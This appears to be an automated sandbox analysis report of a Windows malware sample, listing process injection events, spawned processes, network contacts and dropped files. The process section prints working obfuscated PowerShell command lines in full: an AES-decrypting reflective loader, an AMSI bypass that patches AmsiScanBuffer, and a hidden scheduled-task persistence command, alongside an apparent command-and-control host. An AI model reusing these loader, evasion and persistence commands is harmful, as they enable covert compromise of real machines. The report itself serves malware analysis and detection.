PID 1212 wrote to memory of 1132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 4144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 4752 wrote to memory of 4144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 4752 wrote to memory of 4144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 4144 wrote to memory of 2640 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4144 wrote to memory of 2640 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4144 wrote to memory of 2640 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 4384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 4384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 4384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 4384 wrote to memory of 424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 4384 wrote to memory of 424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 5052 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2788 wrote to memory of 564 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2788 wrote to memory of 648 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2788 wrote to memory of 736 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 912 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1016 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 2788 wrote to memory of 492 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 636 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1052 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1088 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1160 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1192 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1256 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1312 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1320 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1328 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1448 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1488 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1548 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1556 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1576 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1684 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2788 wrote to memory of 1780 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1792 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2788 wrote to memory of 1808 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2788 wrote to memory of 1828 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1896 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 1976 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 2788 wrote to memory of 1724 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 2156 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 2348 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 2356 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 2372 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 2788 wrote to memory of 2532 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s NlaSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s StateRepository

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s CryptSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

c:\windows\system32\sihost.exe

sihost.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc

c:\windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s CDPSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\System32\InstallAgent.exe

C:\Windows\System32\InstallAgent.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_996_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_996.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_996.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_996.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_996.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UcaVogQYndUz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TKntOQKhcJCXwY,[Parameter(Position=1)][Type]$zdpqEVWmnJ)$kFnbgjLREQR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+'t'+[Char](101)+'d'+[Char](68)+''+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+'yMod'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'ype',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+','+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',S'+[Char](101)+''+[Char](97)+''+'l'+'ed'+[Char](44)+'A'+'n'+''+'s'+'i'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+''+'u'+'t'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$kFnbgjLREQR.DefineConstructor(''+[Char](82)+'TSp'+[Char](101)+''+[Char](99)+'i'+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+'i'+''+'g'+','+[Char](80)+'u'+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$TKntOQKhcJCXwY).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+''+'a'+'g'+[Char](101)+''+'d'+'');$kFnbgjLREQR.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+'c,Hi'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+','+'Ne'+[Char](119)+''+'S'+''+'l'+'o'+'t'+''+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$zdpqEVWmnJ,$TKntOQKhcJCXwY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $kFnbgjLREQR.CreateType();}$foMafCrgNQwgC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+'d'+'ll')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+'ft.'+'W'+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+'v'+'e'+''+[Char](77)+'et'+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$AcNNFrRGbCBriI=$foMafCrgNQwgC.GetMethod(''+[Char](71)+''+[Char](101)+'tPr'+[Char](111)+''+'c'+''+[Char](65)+'d'+'d'+'r'+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+'ta'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GwSyYrDsMJLHIEtxnHS=UcaVogQYndUz @([String])([IntPtr]);$jZQrBHTDRsuEITzOScrISL=UcaVogQYndUz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cIRMfQarlPC=$foMafCrgNQwgC.GetMethod(''+'G'+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'eH'+'a'+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+'3'+'2'+''+'.'+''+[Char](100)+'ll')));$uVGFLzWDoAElAM=$AcNNFrRGbCBriI.Invoke($Null,@([Object]$cIRMfQarlPC,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'Lib'+'r'+'ar'+[Char](121)+''+[Char](65)+'')));$uaVQyGrOGkimASayS=$AcNNFrRGbCBriI.Invoke($Null,@([Object]$cIRMfQarlPC,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$CgmNZXa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uVGFLzWDoAElAM,$GwSyYrDsMJLHIEtxnHS).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$rSPlwqCGOTvacAnxk=$AcNNFrRGbCBriI.Invoke($Null,@([Object]$CgmNZXa,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+'nB'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$cBrSPJPpll=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uaVQyGrOGkimASayS,$jZQrBHTDRsuEITzOScrISL).Invoke($rSPlwqCGOTvacAnxk,[uint32]8,4,[ref]$cBrSPJPpll);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rSPlwqCGOTvacAnxk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uaVQyGrOGkimASayS,$jZQrBHTDRsuEITzOScrISL).Invoke($rSPlwqCGOTvacAnxk,[uint32]8,0x20,[ref]$cBrSPJPpll);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+'s'+[Char](120)+''+[Char](114)+''+'s'+''+'t'+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{e1f9eaad-a669-4141-9596-0777a9121d57}

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6Y0uWYpEdHGM.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping -n 10 localhost

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 runderscore00-63294.portmap.host udp
DE 193.161.193.99:63294 runderscore00-63294.portmap.host tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 99.193.161.193.in-addr.arpa udp
US 8.8.8.8:53 226.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/4752-2-0x000000007341E000-0x000000007341F000-memory.dmp

memory/4752-3-0x0000000005470000-0x00000000054A6000-memory.dmp

memory/4752-5-0x0000000007B50000-0x0000000008178000-memory.dmp

memory/4752-4-0x0000000073410000-0x0000000073AFE000-memory.dmp

memory/4752-6-0x00000000081F0000-0x0000000008212000-memory.dmp

memory/4752-7-0x0000000008290000-0x00000000082F6000-memory.dmp

memory/4752-8-0x00000000084E0000-0x0000000008546000-memory.dmp

memory/4752-9-0x0000000008550000-0x00000000088A0000-memory.dmp

memory/4752-12-0x0000000008910000-0x000000000892C000-memory.dmp

memory/4752-13-0x0000000008EE0000-0x0000000008F2B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhdfwwfp.ekk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4752-32-0x0000000008EA0000-0x0000000008EDC000-memory.dmp

memory/4752-63-0x0000000009BA0000-0x0000000009C16000-memory.dmp

memory/4752-64-0x0000000073410000-0x0000000073AFE000-memory.dmp

memory/4752-69-0x000000000ADD0000-0x000000000B448000-memory.dmp

memory/4752-70-0x000000000A770000-0x000000000A78A000-memory.dmp

memory/4752-71-0x0000000004F20000-0x0000000004F28000-memory.dmp

memory/4752-72-0x000000000A880000-0x000000000A8EE000-memory.dmp

memory/4752-73-0x000000000D950000-0x000000000DE4E000-memory.dmp

memory/2756-83-0x0000000073410000-0x0000000073AFE000-memory.dmp

memory/2756-84-0x0000000073410000-0x0000000073AFE000-memory.dmp

memory/2756-101-0x0000000008F00000-0x0000000008F33000-memory.dmp

memory/2756-103-0x0000000008EE0000-0x0000000008EFE000-memory.dmp

memory/2756-108-0x0000000073410000-0x0000000073AFE000-memory.dmp

memory/2756-102-0x000000006FFF0000-0x000000007003B000-memory.dmp

memory/2756-109-0x0000000009080000-0x0000000009125000-memory.dmp

memory/2756-110-0x0000000009220000-0x00000000092B4000-memory.dmp

memory/2756-202-0x0000000073410000-0x0000000073AFE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 ac3d19fbb5c5f10833f1882308f77548
